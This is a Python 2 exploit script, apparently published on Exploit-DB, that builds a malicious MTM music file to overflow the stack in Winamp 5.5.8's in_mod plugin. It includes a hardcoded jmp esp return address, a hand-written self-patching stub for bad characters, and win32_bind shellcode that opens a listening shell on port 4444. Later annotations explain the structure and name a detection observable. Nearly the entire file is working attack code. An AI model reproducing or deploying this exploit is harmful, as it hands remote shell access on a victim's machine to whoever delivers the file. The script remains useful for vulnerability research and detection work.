#!/usr/bin/python
# Pwn And Beans by Mighty-D presents:
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC by fdisk
# Exploit by Mighty-D
# Special thanks to:
# fdisk: Who wrote the skeleton of what you are looking at
# Ryujin: For pointing the bug
# Muts: For bringing the pain and the omelet ideas that weren't used
# dijital1 and All the EDB-Team
# The guys from UdeA, Ryepes, HerreraDavid, GomezRam7
# Just one comment: Stupid badchars!!!!!!!
#
# What this script does: it concatenates a crafted MTM module-file header,
# a large filler, a 4-byte return address, a small self-patching stub and a
# payload, and writes the result to "crash.mtm" in the current directory.
# It is Python 2 code (print statements); it has no CLI arguments and does
# no input validation.

# MTM file header. The first three bytes are the ASCII magic "MTM"; the run
# from \x53 to \x29 spells the song name "SpaceTrack(kosmosis)".
header = "\x4D\x54\x4D\x10\x53\x70\x61\x63\x65\x54\x72\x61\x63\x6B\x28\x6B\x6F\x73\x6D\x6F\x73\x69\x73\x29\xE0\x00\x29\x39\x20\xFF\x1F\x00\x40\x0E"
header += "\x04\x0C" * 16
# 58207 bytes of 0x90 (NOP) filler that pads the buffer up to the overwrite.
nopsled = "\x90" * 58207
# Return-address overwrite. Per the author's note this address is specific to
# the Spanish-locale XP build they tested on and is not portable.
eip = "\xED\x1E\x95\x7C" # jmp esp WIN XP SPANISH change at will
# Self-patching stub. The author's comments describe its structure: EBX is
# pointed at the payload and advanced byte by byte ("Move EBX ..."), and
# selected bytes are rewritten in place ("Set it to NN"). Comparing the
# "Should be NN" bytes below with the 0x20 subtractions here, the bytes the
# author could not store directly were saved as NN+0x20 and are corrected
# in memory at run time.
patch_shellcode = "\x90" * 16
patch_shellcode += "\x90\x33\xDB" # Set EBX to zero
patch_shellcode += "\x54\x5B" # PUSH ESP ; POP EBXGET THE RELATIVE POSITION
patch_shellcode += "\x81\xEB\x95\xFC\xFF\xFF" # make EBX point to our shell
patch_shellcode += "\x43"*13 # Move EBX as close as we can to the first badchar
patch_shellcode += "\x90"*4 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*1 # Move EBX to the first badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 13 -verified
patch_shellcode += "\x43"*3 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 05- verified
patch_shellcode += "\x43"*16 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\xEC" # Set it to 21 - verified
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x7C" # Set it to 8e - verified
patch_shellcode += "\x90"*8 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*30 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 05 - verified
patch_shellcode += "\x90"*8 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*11 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x42" # Set it to CB - verified
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x78" # Set it to 92 - verified
patch_shellcode += "\x90"*26 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*18 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 04 - verified
patch_shellcode += "\x90"*16 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*15 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 02 - verified
patch_shellcode += "\x43"*8 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x21" # Set it to EC - verified
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x7C" # Set it to 8e - verified
patch_shellcode += "\x90"*14 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*18 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x49" # Set it to c1 - verified
patch_shellcode += "\x90"*13 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*4 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to EA, but we need F6
patch_shellcode += "\x80\x2B\xF4" # Set it to F6 - verified
patch_shellcode += "\x43"*9 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 11 - verified
patch_shellcode += "\x43"*10 # Move EBX to the next badchar
patch_shellcode += "\x90"*3 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x80\x2B\xCD" # Set it to 3D - verified
patch_shellcode += "\x43"*3 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 07 - verified
patch_shellcode += "\x43"*11 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified
patch_shellcode += "\x43"*4 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified
patch_shellcode += "\x90"*13 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*4 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified
patch_shellcode += "\x43"*8 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified
patch_shellcode += "\x90"*19 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*11 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x8E" # Set it to 7F - verified
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\xDF" # Set it to 2B - verified
patch_shellcode += "\x43"*8 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x1E" # Set it to EC - verified
patch_shellcode += "\x90"*11 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*12 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 8 - verified
patch_shellcode += "\x90"*28 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*29 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\xa7" # Set it to 66 - verified
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x90"*4 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x80\x2B\xb8" # Set it to 52 - verified
patch_shellcode += "\x90"*9 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*17 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 3 - verified
patch_shellcode += "\x90"*9 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*3 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified
patch_shellcode += "\x90"*12 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*2 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 3 - verified
patch_shellcode += "\x43"*7 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 2 - verified
patch_shellcode += "\x90"*10 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*6 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 13 - verified
patch_shellcode += "\x43"*3 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to5 - verified
patch_shellcode += "\x43"*3 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x1B" # Set it to F2 - verified
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\xF4" # Set it to 16 - verified
patch_shellcode += "\x90"*19 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*4 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 10 - verified
patch_shellcode += "\x43"*4 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 10 - verified
patch_shellcode += "\x90"*20 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*17 # Move EBX to the next badchar
patch_shellcode += "\x90"*28 # Lazy nopsled
patch_shellcode += "\x43"*16 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x26" # Set it to E7 - verified
patch_shellcode += "\x90"*18 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\xBE" # Set it to 4C - verified
patch_shellcode += "\x43"*7 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 5 - verified
patch_shellcode += "\x90"*(66)

# Payload, as labelled by the author:
# win32_bind -EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub
# Detection note: per that label the payload opens a listening TCP socket on
# port 4444 inside the player process; a media player binding a listener is
# the host/network observable for this sample. The "Should be NN" and
# "Ripped" comments mark bytes that were altered or removed by hand and are
# restored by the stub above; the stored bytes are therefore not a verbatim
# copy of the generator's output.
shellcode= "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
shellcode += "\x33" # Should be 13
shellcode += "\xa9\x41"
shellcode += "\x25" # should be 05
shellcode += "\x3f\x83\xeb\xfc\xe2\xf4\x55\x2b\xee\x72\x41\xb8\xfa\xc0"
shellcode += "\x56" # \x21\x8e Ripped
shellcode += "\x53\x8d\x65\x8e\x7a\x95\xca\x79\x3a\xd1\x40\xea\xb4"
shellcode += "\xe6\x59\x8e\x60\x89\x40\xee\x76\x22\x75\x8e\x3e\x47\x70\xc5\xa6"
shellcode += "\x25" # should be 05
shellcode += "\xc5\xc5\x4b\xae\x80\xcf\x32\xa8\x83\xee" # \xcb\x92
shellcode += "\x15\x21\x17"
shellcode += "\xdc\xa4\x8e\x60\x8d\x40\xee\x59\x22\x4d\x4e\xb4\xf6\x5d"
shellcode += "\x24" #Should be 04
shellcode += "\xd4\xaa\x6d\x8e\xb6\xc5\x65\x19\x5e\x6a\x70\xde\x5b\x22"
shellcode += "\x22" # Should be 02
shellcode += "\x35\xb4\xe9\x4d\x8e\x4f\xb5" # \xec\8e Ripped
shellcode += "\x7f\xa1\x1f\x6d\xb1\xe7\x4f\xe9\x6f"
shellcode += "\x56\x97\x63\x6c\xcf\x29\x36\x0d" # \xc1 Ripped
shellcode += "\x36\x76\x0d" # \xf6 ripped
shellcode += "\x15\xfa\xef"
shellcode += "\xc1\x8a\xe8\xc3\x92"
shellcode += "\x31" # Should be 11
shellcode += "\xfa\xe9\xf6\xc8\xe0\x59\x28\xac\x0d" # \x3d ripped
shellcode += "\xfc\x2b"
shellcode += "\x27" # should be 07
shellcode += "\xc0\x79\x29\xdc\x36\x5c\xec\x52\xc0\x7f"
shellcode += "\x32" # should be 12
shellcode += "\x56\x6c\xfa"
shellcode += "\x32" # should be 12
shellcode += "\x46\x6c\xea"
shellcode += "\x32" # should be 12
shellcode += "\xfa\xef\xcf\x29\x14\x63\xcf"
shellcode += "\x32" #should be 12
shellcode += "\x8c\xde"
shellcode += "\x3c\x29\xa1\x25\xd9\x86\x52\xC0" # \x7f\x2b Ripped
shellcode += "\x15\x6e\xfc\xbe\xd5\x57"
shellcode += "\x0d" # \xec Ripped
shellcode += "\x2b\xd6\xfe\xbe\xd3\x6c\xfc\xbe\xd5\x57\x4c"
shellcode += "\x28" # should be 08
shellcode += "\x83\x76"
shellcode += "\xfe\xbe\xd3\x6f\xfd\x15\x50\xc0\x79\xd2\x6d\xd8\xd0\x87\x7c\x68"
shellcode += "\x56\x97\x50\xc0\x79\x27\x6f\x5b\xcf\x29" # \x66\x52 Ripped
shellcode += "\x20\xa4\x6f\x6f"
shellcode += "\xf0\x68\xc9\xb6\x4e\x2b\x41\xb6\x4b\x70\xc5\xcc"
shellcode += "\x23" # shoudl be 03
shellcode += "\xbf\x47"
shellcode += "\x32" #Should be 12
shellcode += "\x57"
shellcode += "\x23" # Should be 03
shellcode += "\x29\xac\x24\x3b\x3d\x94"
shellcode += "\x22"# should be 02
shellcode += "\xea\x6d\x4d\x57\xf2"
shellcode += "\x33" # should be 13
shellcode += "\xc0\xdc"
shellcode += "\x25" # should be 5
shellcode += "\xfa\xe9" # \xf2\x16 Ripped
shellcode += "\x57\x6e\xf8"
shellcode += "\x30" #should be 10
shellcode += "\x6f\x3e\xf8"
shellcode += "\x30" # Should be 10
shellcode += "\x50\x6e"
shellcode += "\x56\x91\x6d\x92\x70\x44\xcb\x6c\x56\x97\x6f\xc0\x56\x76\xfa\xef"
shellcode += "\x22\x16\xf9\xbc\x6d\x25\xfa\xe9\xfb\xbe\xd5"
shellcode += "\x57\xd7\x99" #\xe7\x4c Ripped
shellcode += "\xfa\xbe\xd3\xc0\x79\x41"
shellcode += "\x25" # should be 05
shellcode += "\x3f"

# Final file image: header, filler, return address, stub, payload - in that
# order. Every component is a plain (byte) str, so this is byte concatenation
# under Python 2.
payload = header + nopsled + eip + patch_shellcode + shellcode

# Write the image to disk. Maintenance notes:
# - The file is opened in text mode ("w"); the author's "CrLf" comments above
#   suggest the byte layout was tuned with that in mind, so presumably the
#   mode is deliberate - confirm before changing it.
# - `file` shadows the Python 2 builtin of the same name.
# - The bare except swallows every exception (including KeyboardInterrupt)
#   and discards the reason, so a failed write only prints the generic
#   message; `except IOError as e:` with the error text would be more useful.
try:
    file = open("crash.mtm", "w")
    file.write(payload)
    file.close()
    print "MTM file generated successfuly"
except:
    print "Cannot create file"